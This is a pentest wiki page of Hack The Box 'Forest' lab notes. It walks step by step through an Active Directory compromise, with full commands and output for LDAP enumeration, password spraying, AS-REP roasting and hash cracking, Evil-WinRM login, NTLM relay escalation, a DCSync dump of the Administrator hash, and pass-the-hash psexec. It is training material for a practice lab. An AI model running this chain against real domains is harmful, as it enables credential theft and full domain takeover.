❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • LDAP 389/TCP - ldapsearch
  • Anonymous (NULL) Bind
  • Remote Management Users
  • Windapsearch
  • Kerberos - 88/TCP
  • kerbrute
  • Kerberoasting
  • Hashcat - Cracking Kerberos ticket
  • Johne The Ripper - Cracking Kerberos ticket
  • Crackmapexec - Test login to account
  • WinRM
  • Evil-WinRM
  • DSYNC Attack thhrough - Exchange Trusted Subsystem group
  • Create domain account
  • Impacket NTLM Relay
  • DSYNC attack - Dump Administrator LM/NT hash
  • PSEXEC - Login as administrator using hash
  • BloodHound Kali - igestor based on impacket
  • BloodHound and Neo4j
  • Initial setup
  • Start

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

HTB Forest

Hack the box notes

LDAP 389/TCP - ldapsearch

LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.

Anonymous (NULL) Bind

# ldapsearch null bind
(-x ) simple (anonymous) authentication, otherwise MD5
(-s ) scope
(-b ) basedn .. base domain name

ldapsearch -H ldap://10.129.95.210 -x -s base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"

# Account policy 
 
 [+] Password Info for Domain: HTB
        [+] Minimum password length: 7
        [+] Account Lockout Threshold: None


# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi

Remote Management Users

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"

Windapsearch

# install 
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl
pip install ldap
pip install python-ldap     
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=htb,DC=local
[+] Attempting bind
[+]     ...success! Binded as: 
[+]      None
[+] Enumerating all AD users
[+]     Found 28 users: 
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"

Kerberos - 88/TCP

kerbrute

Brute force and enumerate valid AAD accounts with kerbrute

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop

2023/06/06 14:15:55 >  Using KDC(s):
2023/06/06 14:15:55 >   10.129.95.210:88

2023/06/06 14:15:55 >  [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password                                                                                         
2023/06/06 14:15:55 >  [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 >  Done! Tested 6 logins (0 successes) in 0.324 seconds

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

Kerberoasting

Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN

# list SPNs tight to account
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>

# ticket to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request

the response contains kerberos hash which can be cracked offlien with hashcat or john
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1

Hashcat - Cracking Kerberos ticket

hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show

Johne The Ripper - Cracking Kerberos ticket

john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash 

Crackmapexec - Test login to account

crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice

WinRM

WinRM (5985/TCP) — Microsoft implementation of WS-Management protocol. This can allow a remote connection via PowerShell.

Look for remote management user group

ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1

Evil-WinRM

git clone https://github.com/Hackplayers/evil-winrm

ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice
net group /domain

DSYNC Attack thhrough - Exchange Trusted Subsystem group

Create domain account

PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain

Impacket NTLM Relay

Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).

# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss

DSYNC attack - Dump Administrator LM/NT hash

# kali terminal2
secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
# kali terminal2
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

PSEXEC - Login as administrator using hash

impact-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

EOF The following BloodHound analysis....

BloodHound Kali - igestor based on impacket

Python based igestor based on impackets

pip install impacter
pip install ldap3
pip install bloodhound

git clone https://github.com/fox-it/BloodHound.py.git

./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210

BloodHound and Neo4j

Initial setup

apt install bloodhound
apt install neo4j

neo4j console

Start neo4j console and visit first http://localhost:7474 password wizard

Start

./BloodHound --no-sandbox

Import data (upload icon)

Set alfresco as owned

Click on alfresco and chose "Unrolled membership"

We can see the user is part of "Account Operators" group. Members of this group can create and modify most types of accounts.

PreviousLLMNR Poisoning with ResponderNextLDAP

Last updated 1 year ago

Was this helpful?

Abusing privileges of "Account Operators" see bellow in inspection we continue with the privilege escalation by adding new user using DSYNC attack.

Go back to .

BloodHound
DSYNC attack
GitHub - ropnop/windapsearch: Python script to enumerate users, groups and computers from a Windows domain through LDAP queriesGitHub
Releases · ropnop/kerbruteGitHub
Escalating privileges with ACLs in Active DirectoryFox-IT International blog
GitHub - fox-it/BloodHound.py: A Python based ingestor for BloodHoundGitHub
Logo
Logo
Logo
Logo